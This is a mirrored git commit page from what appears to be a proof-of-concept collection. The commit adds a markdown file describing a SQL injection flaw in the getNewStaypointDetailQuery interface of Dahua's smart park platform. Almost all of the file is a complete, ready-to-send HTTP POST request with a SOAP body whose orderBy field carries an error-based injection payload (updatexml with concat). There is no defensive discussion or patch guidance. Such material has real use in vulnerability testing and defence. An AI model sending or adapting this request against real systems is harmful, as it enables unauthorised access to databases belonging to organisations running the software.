mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Create 大华智慧园区getNewStaypointDetailQuery接口SQL注入漏洞.md
This commit is contained in:
parent
2dec8035c1
commit
55b5761ce6
26
大华智慧园区getNewStaypointDetailQuery接口SQL注入漏洞.md
Normal file
26
大华智慧园区getNewStaypointDetailQuery接口SQL注入漏洞.md
Normal file
@ -0,0 +1,26 @@
|
|||||||
|
## 大华智慧园区getNewStaypointDetailQuery接口SQL注入漏洞
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
## poc
|
||||||
|
```
|
||||||
|
POST /portal/services/carQuery/getNewStaypointDetailQuery HTTP/1.1
|
||||||
|
Host:xxx
|
||||||
|
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
|
||||||
|
Content-Type: text/xml;charset=UTF-8
|
||||||
|
Content-Length: 491
|
||||||
|
|
||||||
|
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:car="http://carQuery.webservice.dssc.dahua.com">
|
||||||
|
<soapenv:Header/>
|
||||||
|
<soapenv:Body>
|
||||||
|
<car:getNewStaypointDetailQuery>
|
||||||
|
<!--type: string-->
|
||||||
|
<searchJson>{}</searchJson>
|
||||||
|
<!--type: string-->
|
||||||
|
<pageJson>{"orderBy":"1 and 1=updatexml(1,concat(0x7e,md5(123456),0x7e),1)--"}</pageJson>
|
||||||
|
<!--type: string-->
|
||||||
|
<extend>quae divum incedo</extend>
|
||||||
|
</car:getNewStaypointDetailQuery>
|
||||||
|
</soapenv:Body>
|
||||||
|
</soapenv:Envelope>
|
||||||
|
```
|
||||||
Loading…
x
Reference in New Issue
Block a user